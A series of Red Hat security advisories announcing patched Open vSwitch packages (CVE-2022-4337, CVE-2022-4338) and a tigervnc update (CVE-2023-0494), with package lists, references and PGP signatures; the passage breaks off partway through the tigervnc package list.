Red Hat Security Advisory 2023-0685-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include an out of bounds read vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.13 security, bug fix and enhancement update  
Advisory ID:       RHSA-2023:0685-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0685  
Issue date:        2023-02-09  
CVE Names:         CVE-2022-4337 CVE-2022-4338   
=====================================================================

1. Summary:

An update for openvswitch2.13 is now available for Fast Datapath for Red  
Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: Out-of-Bounds Read in Organization Specific TLV  
(CVE-2022-4337)  
* openvswitch: Integer Underflow in Organization Specific TLV  
(CVE-2022-4338)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2155378 - CVE-2022-4337 openvswitch: Out-of-Bounds Read in Organization Specific TLV  
2155381 - CVE-2022-4338 openvswitch: Integer Underflow in Organization Specific TLV  
2162023 - [23.A RHEL-8] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.13-2.13.0-212.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.13-2.13.0-212.el8fdp.aarch64.rpm  
openvswitch2.13-2.13.0-212.el8fdp.aarch64.rpm  
openvswitch2.13-debuginfo-2.13.0-212.el8fdp.aarch64.rpm  
openvswitch2.13-debugsource-2.13.0-212.el8fdp.aarch64.rpm  
openvswitch2.13-devel-2.13.0-212.el8fdp.aarch64.rpm  
openvswitch2.13-ipsec-2.13.0-212.el8fdp.aarch64.rpm  
python3-openvswitch2.13-2.13.0-212.el8fdp.aarch64.rpm  
python3-openvswitch2.13-debuginfo-2.13.0-212.el8fdp.aarch64.rpm

noarch:  
openvswitch2.13-test-2.13.0-212.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.13-2.13.0-212.el8fdp.ppc64le.rpm  
openvswitch2.13-2.13.0-212.el8fdp.ppc64le.rpm  
openvswitch2.13-debuginfo-2.13.0-212.el8fdp.ppc64le.rpm  
openvswitch2.13-debugsource-2.13.0-212.el8fdp.ppc64le.rpm  
openvswitch2.13-devel-2.13.0-212.el8fdp.ppc64le.rpm  
openvswitch2.13-ipsec-2.13.0-212.el8fdp.ppc64le.rpm  
python3-openvswitch2.13-2.13.0-212.el8fdp.ppc64le.rpm  
python3-openvswitch2.13-debuginfo-2.13.0-212.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.13-2.13.0-212.el8fdp.s390x.rpm  
openvswitch2.13-2.13.0-212.el8fdp.s390x.rpm  
openvswitch2.13-debuginfo-2.13.0-212.el8fdp.s390x.rpm  
openvswitch2.13-debugsource-2.13.0-212.el8fdp.s390x.rpm  
openvswitch2.13-devel-2.13.0-212.el8fdp.s390x.rpm  
openvswitch2.13-ipsec-2.13.0-212.el8fdp.s390x.rpm  
python3-openvswitch2.13-2.13.0-212.el8fdp.s390x.rpm  
python3-openvswitch2.13-debuginfo-2.13.0-212.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.13-2.13.0-212.el8fdp.x86_64.rpm  
openvswitch2.13-2.13.0-212.el8fdp.x86_64.rpm  
openvswitch2.13-debuginfo-2.13.0-212.el8fdp.x86_64.rpm  
openvswitch2.13-debugsource-2.13.0-212.el8fdp.x86_64.rpm  
openvswitch2.13-devel-2.13.0-212.el8fdp.x86_64.rpm  
openvswitch2.13-ipsec-2.13.0-212.el8fdp.x86_64.rpm  
python3-openvswitch2.13-2.13.0-212.el8fdp.x86_64.rpm  
python3-openvswitch2.13-debuginfo-2.13.0-212.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4337  
https://access.redhat.com/security/cve/CVE-2022-4338  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+Rnx9zjgjWX9erEAQhoqA//eVSH/rzCjxirrCqe8joiao6/6Z2anVIe  
OTSeM4KT5eL+Q1u3/EfQqqHguhKiHieNrqLPjkaz5vi5iFhp9Q1+Uw+rx54hG7Xm  
gfiZ68uknHPh/DVaWCkNsYjhxaHebFvInsUtsgho3ONZXRosQRxOfH5qUAjXTHUr  
joqwSjW0CgYll56vAqLUCtOThNhRq1hwFRzs+lroSamT1OZDX66eI47yiEJigYaR  
KO95vp7ae0sIL/2nWMGkGJJZblbDXi8C0RxgHo4+NWlSZK14AHY/WCNl3UWSCcKK  
GhYmkYy8xevpCSojDQyXEBJ5NakY1pOFlI3ZfGUR1vz2rdDhuB2+bDsRO57viy6q  
5Jz/Z6k+l+akKoHtN3vK5lpvY9AquSnfY/wzze3Vz0pm1vl/YnTkx58ChRmbPGzn  
fF0YnWNFlyi8xtft3DTC52WRC+M2/iKB1/sm/hUen3gAeBeRTl1fZr4LDDKgZg6A  
oXus6acMT1mVaWeV++8KCcCbKBDsIJHbj2Oiq/LKKiDWYX8Yywl3eqTabBrKYqe+  
qcapTGMqByPTvvCuyu/U14JNP6H6xncBlPgUsvldClgowN2b2xuhNAI3HAflaUA9  
9J6R7UfQGYMEYvN8dVSP5GDNE6tWU6phnD8o1l1bDDM7jDLJFjbwYZ8aJxFN8rtY  
j1wr+snabOs=  
=EgiF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0685-01

Red Hat Security Advisory 2023-0688-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include an out of bounds read vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.17 security, bug fix and enhancement update  
Advisory ID:       RHSA-2023:0688-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0688  
Issue date:        2023-02-09  
CVE Names:         CVE-2022-4337 CVE-2022-4338   
=====================================================================

1. Summary:

An update for openvswitch2.17 is now available for Fast Datapath for Red  
Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: Out-of-Bounds Read in Organization Specific TLV  
(CVE-2022-4337)  
* openvswitch: Integer Underflow in Organization Specific TLV  
(CVE-2022-4338)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2155378 - CVE-2022-4337 openvswitch: Out-of-Bounds Read in Organization Specific TLV  
2155381 - CVE-2022-4338 openvswitch: Integer Underflow in Organization Specific TLV  
2162034 - [23.A RHEL-8] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.17-2.17.0-71.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.17-2.17.0-71.el8fdp.aarch64.rpm  
openvswitch2.17-2.17.0-71.el8fdp.aarch64.rpm  
openvswitch2.17-debuginfo-2.17.0-71.el8fdp.aarch64.rpm  
openvswitch2.17-debugsource-2.17.0-71.el8fdp.aarch64.rpm  
openvswitch2.17-devel-2.17.0-71.el8fdp.aarch64.rpm  
openvswitch2.17-ipsec-2.17.0-71.el8fdp.aarch64.rpm  
python3-openvswitch2.17-2.17.0-71.el8fdp.aarch64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-71.el8fdp.aarch64.rpm

noarch:  
openvswitch2.17-test-2.17.0-71.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.17-2.17.0-71.el8fdp.ppc64le.rpm  
openvswitch2.17-2.17.0-71.el8fdp.ppc64le.rpm  
openvswitch2.17-debuginfo-2.17.0-71.el8fdp.ppc64le.rpm  
openvswitch2.17-debugsource-2.17.0-71.el8fdp.ppc64le.rpm  
openvswitch2.17-devel-2.17.0-71.el8fdp.ppc64le.rpm  
openvswitch2.17-ipsec-2.17.0-71.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-2.17.0-71.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-71.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.17-2.17.0-71.el8fdp.s390x.rpm  
openvswitch2.17-2.17.0-71.el8fdp.s390x.rpm  
openvswitch2.17-debuginfo-2.17.0-71.el8fdp.s390x.rpm  
openvswitch2.17-debugsource-2.17.0-71.el8fdp.s390x.rpm  
openvswitch2.17-devel-2.17.0-71.el8fdp.s390x.rpm  
openvswitch2.17-ipsec-2.17.0-71.el8fdp.s390x.rpm  
python3-openvswitch2.17-2.17.0-71.el8fdp.s390x.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-71.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.17-2.17.0-71.el8fdp.x86_64.rpm  
openvswitch2.17-2.17.0-71.el8fdp.x86_64.rpm  
openvswitch2.17-debuginfo-2.17.0-71.el8fdp.x86_64.rpm  
openvswitch2.17-debugsource-2.17.0-71.el8fdp.x86_64.rpm  
openvswitch2.17-devel-2.17.0-71.el8fdp.x86_64.rpm  
openvswitch2.17-ipsec-2.17.0-71.el8fdp.x86_64.rpm  
python3-openvswitch2.17-2.17.0-71.el8fdp.x86_64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-71.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4337  
https://access.redhat.com/security/cve/CVE-2022-4338  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+RnxNzjgjWX9erEAQiAng/8CEF0s+9tyHZJ5vvhbA4EMhTBY30BvlWf  
WPyybqxk2tucXuk4ARfruStnf/AZpL8xtf9aznCOhP4vacrpWYp7PJausIRfLKwG  
Jk1xsOJs3imyKSMkJR9ilJBvuyG6GFD9e/RR/2z5H1vpcw1ldL9MpizDyVLy0I3F  
XYjgMIHJDC66PwJRua4ABeiIrX2P8+tCm3cynXxrA/08DvVsQ/HZMnO5XMZh6+uw  
QXubvp6ThkNJBLi5fENErJWAlpu31c/sI6njP7VZdInRX+mDh99aDFFvAGZ4RetQ  
DslipMvHpe7niXEJ9EEXirAZkGOHhNQmh5e3wXYjc4Fn1lq+hLDB2friB0rNdBlR  
e4BG3m3wK9TebgvpLkK7mt3jdn8zlxAtY33Wg2SYSHLwpFj0kxQ0tZAKQTTpwc9l  
Ek/yfFubEGfZoYIhqCBFOEnEb635SVXQYFL2QQw4JGZf46xEewBxLxftp/SZ4H7D  
eLQXmrBHflEALaqnazOPObNNw2jB7gQmm5svAatZd1fy1vcFVIqB7hdy701SpWBm  
jzlvazTq59t3UmlUPs9OhkIOR//BaUuuSLqNm3xPGxE2hHOsC/yURdYBcfFRRBcf  
zqWOHIRNysHcyzBMtixtnbB9S4uf5EKo9RGf2TLGRW1ZdFYN2TsA7ryklWo/9RRD  
QliC+OVLpHo=  
=mmIf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0688-01

Red Hat Security Advisory 2023-0689-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include an out of bounds read vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.16 security, bug fix and enhancement update  
Advisory ID:       RHSA-2023:0689-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0689  
Issue date:        2023-02-09  
CVE Names:         CVE-2022-4337 CVE-2022-4338   
=====================================================================

1. Summary:

An update for openvswitch2.16 is now available for Fast Datapath for Red  
Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: Out-of-Bounds Read in Organization Specific TLV  
(CVE-2022-4337)  
* openvswitch: Integer Underflow in Organization Specific TLV  
(CVE-2022-4338)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2155378 - CVE-2022-4337 openvswitch: Out-of-Bounds Read in Organization Specific TLV  
2155381 - CVE-2022-4338 openvswitch: Integer Underflow in Organization Specific TLV  
2162031 - [23.A RHEL-8] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.16-2.16.0-111.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.16-2.16.0-111.el8fdp.aarch64.rpm  
openvswitch2.16-2.16.0-111.el8fdp.aarch64.rpm  
openvswitch2.16-debuginfo-2.16.0-111.el8fdp.aarch64.rpm  
openvswitch2.16-debugsource-2.16.0-111.el8fdp.aarch64.rpm  
openvswitch2.16-devel-2.16.0-111.el8fdp.aarch64.rpm  
openvswitch2.16-ipsec-2.16.0-111.el8fdp.aarch64.rpm  
python3-openvswitch2.16-2.16.0-111.el8fdp.aarch64.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-111.el8fdp.aarch64.rpm

noarch:  
openvswitch2.16-test-2.16.0-111.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.16-2.16.0-111.el8fdp.ppc64le.rpm  
openvswitch2.16-2.16.0-111.el8fdp.ppc64le.rpm  
openvswitch2.16-debuginfo-2.16.0-111.el8fdp.ppc64le.rpm  
openvswitch2.16-debugsource-2.16.0-111.el8fdp.ppc64le.rpm  
openvswitch2.16-devel-2.16.0-111.el8fdp.ppc64le.rpm  
openvswitch2.16-ipsec-2.16.0-111.el8fdp.ppc64le.rpm  
python3-openvswitch2.16-2.16.0-111.el8fdp.ppc64le.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-111.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.16-2.16.0-111.el8fdp.s390x.rpm  
openvswitch2.16-2.16.0-111.el8fdp.s390x.rpm  
openvswitch2.16-debuginfo-2.16.0-111.el8fdp.s390x.rpm  
openvswitch2.16-debugsource-2.16.0-111.el8fdp.s390x.rpm  
openvswitch2.16-devel-2.16.0-111.el8fdp.s390x.rpm  
openvswitch2.16-ipsec-2.16.0-111.el8fdp.s390x.rpm  
python3-openvswitch2.16-2.16.0-111.el8fdp.s390x.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-111.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.16-2.16.0-111.el8fdp.x86_64.rpm  
openvswitch2.16-2.16.0-111.el8fdp.x86_64.rpm  
openvswitch2.16-debuginfo-2.16.0-111.el8fdp.x86_64.rpm  
openvswitch2.16-debugsource-2.16.0-111.el8fdp.x86_64.rpm  
openvswitch2.16-devel-2.16.0-111.el8fdp.x86_64.rpm  
openvswitch2.16-ipsec-2.16.0-111.el8fdp.x86_64.rpm  
python3-openvswitch2.16-2.16.0-111.el8fdp.x86_64.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-111.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4337  
https://access.redhat.com/security/cve/CVE-2022-4338  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+RntdzjgjWX9erEAQigPw/+LVeq7BITKn7Jgi+Lq5JaFqtJj4vcN2PK  
LdPyRhgumkTbpLzCXCXjVC4UXbOB9lFiISgwaGZdRkfDsaWM7yJ6b86ax5a3hmMD  
/bXg3ycW99v6haa/hxdk1gw9U7Z1FOWWoO/4NAy7l07/fTKK7+gIdZ+0m7ZxbvYE  
4qv/yYPEce/XMk3ANoaEDz+mEwxsVuw34jmiwROGXmITgT9mcZgL45RuCfF1Cduc  
KJkdPX+PTU5kkXYXrF199kL3trL300hl6UkX85x+4Pd8wRcQdO5//W5gqX6Ug0TH  
PW8dFEl/S0IhnxWAk09/db8ycZE6mZO9RweiNJiBPGXteM7iK3ScYEnvBdCu1I/x  
hK5Z1WABIQ0Dkn1/vVynqOdphFFElNkOCRkDWnJCwOr5ZaBS6ps2OaHa6JGgq497  
oJupugEny/Ioq10bh8pYYCqPZE+MbF3Zt5gvW6H3yYNpPk5fM6Z65YSd5Iyi7O3W  
xNYV5XTqiQnbOh9oC9cbHThxu0J1ws+jqnZBDOB9zfBKhWufYPHT2RowovdXhiO8  
flObDGv5tDLD4O2RETiR63ubtWkOgaYXUzSFEM+fRXo+pTyjhV8Iv5mzjZKm13Co  
jRaytOsbaK2g055ZLJXIPiijy6JJ4XR7+m4Ba7JUV1gO4/pz3lp6cGTdXmaOWym0  
QYgmRWSGEjY=  
=sVoq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0689-01

Red Hat Security Advisory 2023-0687-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include an out of bounds read vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.15 security, bug fix and enhancement update  
Advisory ID:       RHSA-2023:0687-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0687  
Issue date:        2023-02-09  
CVE Names:         CVE-2022-4337 CVE-2022-4338   
=====================================================================

1. Summary:

An update for openvswitch2.15 is now available for Fast Datapath for Red  
Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: Out-of-Bounds Read in Organization Specific TLV  
(CVE-2022-4337)  
* openvswitch: Integer Underflow in Organization Specific TLV  
(CVE-2022-4338)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2060552 - Userspace datapath drops the encapsulated packet with inner vlan if sent to the access port  
2155378 - CVE-2022-4337 openvswitch: Out-of-Bounds Read in Organization Specific TLV  
2155381 - CVE-2022-4338 openvswitch: Integer Underflow in Organization Specific TLV  
2162030 - [23.A RHEL-8] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.15-2.15.0-133.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.15-2.15.0-133.el8fdp.aarch64.rpm  
openvswitch2.15-2.15.0-133.el8fdp.aarch64.rpm  
openvswitch2.15-debuginfo-2.15.0-133.el8fdp.aarch64.rpm  
openvswitch2.15-debugsource-2.15.0-133.el8fdp.aarch64.rpm  
openvswitch2.15-devel-2.15.0-133.el8fdp.aarch64.rpm  
openvswitch2.15-ipsec-2.15.0-133.el8fdp.aarch64.rpm  
python3-openvswitch2.15-2.15.0-133.el8fdp.aarch64.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-133.el8fdp.aarch64.rpm

noarch:  
openvswitch2.15-test-2.15.0-133.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.15-2.15.0-133.el8fdp.ppc64le.rpm  
openvswitch2.15-2.15.0-133.el8fdp.ppc64le.rpm  
openvswitch2.15-debuginfo-2.15.0-133.el8fdp.ppc64le.rpm  
openvswitch2.15-debugsource-2.15.0-133.el8fdp.ppc64le.rpm  
openvswitch2.15-devel-2.15.0-133.el8fdp.ppc64le.rpm  
openvswitch2.15-ipsec-2.15.0-133.el8fdp.ppc64le.rpm  
python3-openvswitch2.15-2.15.0-133.el8fdp.ppc64le.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-133.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.15-2.15.0-133.el8fdp.s390x.rpm  
openvswitch2.15-2.15.0-133.el8fdp.s390x.rpm  
openvswitch2.15-debuginfo-2.15.0-133.el8fdp.s390x.rpm  
openvswitch2.15-debugsource-2.15.0-133.el8fdp.s390x.rpm  
openvswitch2.15-devel-2.15.0-133.el8fdp.s390x.rpm  
openvswitch2.15-ipsec-2.15.0-133.el8fdp.s390x.rpm  
python3-openvswitch2.15-2.15.0-133.el8fdp.s390x.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-133.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.15-2.15.0-133.el8fdp.x86_64.rpm  
openvswitch2.15-2.15.0-133.el8fdp.x86_64.rpm  
openvswitch2.15-debuginfo-2.15.0-133.el8fdp.x86_64.rpm  
openvswitch2.15-debugsource-2.15.0-133.el8fdp.x86_64.rpm  
openvswitch2.15-devel-2.15.0-133.el8fdp.x86_64.rpm  
openvswitch2.15-ipsec-2.15.0-133.el8fdp.x86_64.rpm  
python3-openvswitch2.15-2.15.0-133.el8fdp.x86_64.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-133.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4337  
https://access.redhat.com/security/cve/CVE-2022-4338  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+RnstzjgjWX9erEAQgrxA//YYzfMFz+gDBm7R3yBdl4TEcHXoscEaDb  
Scp9iTw8F+HJjeX38mzSuFFAYuXJLbTB+audDLrE0seJE6ErAKRt5NMXSh/Mqa67  
5OLeNq2SWs1YP8cxi5Z1J4gBE+pMweSoIJxfbd2aoCz3Ecr2ogfkv4zgTyQAijRT  
C2g5E04dsitEtil1xWY68RiVO8mmx0OvROR5et8RMYnVx9dT04nlJj+9mBwySFzZ  
GFGUSMGhxNWAzHMEICT8oojKNF1K9d5usGU35xa6iQPDwi572ThRbTsqIG78e5Zi  
+doM+H7O2cBTnRjJl6g6EvwJASboIrRQhr2sd6Avy/6p2BPMF7A/ghSm1p3IpCEZ  
W/PDdE2W/pjO/nae5EbOMj7Zwki6/ONrXpDbWAdL2/yyYs/sr1lXiJqVB4tn5I0u  
8PamkYnA2MMjawVE4x0qwK4aiROqi5c/NDyFNmsKlL9md/0cdyBbmgRxzz9aIKER  
XKKhvPkZNwoS51aeKKtOdEfSrW9B0hel0RPd4AptUgXuBKmBgGJfM8KaiPh1+sPs  
NDIjC89ebZRKC/+OUb7Fr7UmfGUIVYITDLwQb3WRClMj9/hXekMEjTI7v0VMU8Qm  
rYbFeno4nhfNokMN1ChudBMt9OzXNqqgLzHAB8ks2+x7z+wOrQEAOkrZ5FTNMu9i  
ejMT4xWmweE=  
=vMDB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0687-01

Red Hat Security Advisory 2023-0671-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc security update  
Advisory ID:       RHSA-2023:0671-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0671  
Issue date:        2023-02-08  
CVE Names:         CVE-2023-0494   
=====================================================================

1. Summary:

An update for tigervnc is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: DeepCopyPointerClasses use-after-free leads to privilege  
elevation (CVE-2023-0494)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2165995 - CVE-2023-0494 xorg-x11-server: DeepCopyPointerClasses use-after-free leads to privilege elevation

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.1.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.1.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.1.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.1.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.ppc64le.rpm  
